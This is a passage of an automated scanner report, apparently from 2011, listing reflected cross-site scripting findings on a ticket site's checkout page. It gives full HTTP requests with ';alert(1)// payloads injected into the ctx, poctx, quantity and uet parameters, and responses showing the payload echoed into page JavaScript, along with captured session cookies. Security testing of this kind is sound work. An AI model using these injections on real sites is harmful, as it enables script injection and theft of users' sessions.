X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 144
ETag: "366b292b7a2d3acc5d4de62f74d56d95"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: ver=1; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: lvd=1311100531; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: _fancat_session=BAh7GDoPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BHivWNBjoLb2Zmc2V0af6QnToLc3JjX2lkaQH%2FOgdscEkiAf9odHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTU4MTQyNjg%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDIlM0JscG9zJTNEMCUzQnQlM0RidiZjaD1iaW5nZWRjZTMnJTNiYWxlcnQoMSkvL2FmMDI0ODYyZWQzJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiYGOwdGOgxyZWZlcmVyIgGZaHR0cDovL2JpbmcuZmFuc25hcC5jb20vdTItdGlja2V0cy91Mi13aXRoLWludGVycG9sLXJlc2NoZWR1bGVkLWZyb20tNzE5L2p1bHktMjAtMjAxMS0zODk2Njk%2FdXRtX3NvdXJjZT0xOTg3JmFjaz1odHRwJTNhJTJmJTJmd3d3LmJpbmcuY29tJTJmcyUyZmFjay5odG1sOg12aXNpdF9pZGn8JAJK6zoPdmlzaXRvcl9pZCIAOg5zdHlsZV9pZHNJIgAGOwdGOghsb2N7CjsQZhozMi43ODI0OTk5OTk5OTk5OTkAj1w7EWYbLTk2LjgyMDcwMDAwMDAwMDAwMgD08TsSaRI7EyIWRGFsbGFzLUZvcnQgV29ydGg7FEAa--525fcfcbaaad5a8cd8546f8fcd40a32f01ea9edd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12065
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
t: false, ticketSetId: 415814268, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 50.0, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bingedce3';alert(1)//af024862ed3', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.89. http://bing.fansnap.com/checkout/index/415814268 [ctx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The value of the ctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12b3e'%3balert(1)//136c4a6627e was submitted in the ctx parameter. This input was echoed as 12b3e';alert(1)//136c4a6627e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv12b3e'%3balert(1)//136c4a6627e&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 20
ETag: "a41f5ce3feb111485cfaee0b976315ca"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4C%2FDM%2BNBjoLb2Zmc2V0af6QnQ%3D%3D--ffe35ae5260785247f5f10915d7907d41934161c; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11936
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv12b3e';alert(1)//136c4a6627e'), fakeResult: 'none', salePrice: 50.0, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.90. http://bing.fansnap.com/checkout/index/415814268 [poctx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The value of the poctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db107'%3balert(1)//a5bb0f63d2 was submitted in the poctx parameter. This input was echoed as db107';alert(1)//a5bb0f63d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3Bdb107'%3balert(1)//a5bb0f63d2&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 24
ETag: "30746182b6a26d09e669bed81318c644"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BO3ZuPBjoLb2Zmc2V0af6QnQ%3D%3D--32eff0426ea4eec8b3d79233fc816399eae3ea56; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11852
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;db107';alert(1)//a5bb0f63d2', afm: '' });
//]]>
...[SNIP]...

4.91. http://bing.fansnap.com/checkout/index/415814268 [quantity parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2bf1d%3balert(1)//47ce35f909f was submitted in the quantity parameter. This input was echoed as 2bf1d;alert(1)//47ce35f909f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=22bf1d%3balert(1)//47ce35f909f&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

4.92. http://bing.fansnap.com/checkout/index/415814268 [uet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bing.fansnap.com
Path:	/checkout/index/415814268

Issue detail

The value of the uet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36984'%3balert(1)//221666173fb was submitted in the uet parameter. This input was echoed as 36984';alert(1)//221666173fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966936984'%3balert(1)//221666173fb HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 21
ETag: "42e63857998fefbd847dd56d06e79526"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Awb4aQBjoLb2Zmc2V0af6QnQ%3D%3D--7f92d79f54616a72244ca9f33d9f5acace722a83; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11853
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:38966936984';alert(1)//221666173fb'})
//]]>
...[SNIP]...

4.93. http://bing.fansnap.com/checkout/index/418563179 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/checkout/index/418563179

Issue detail

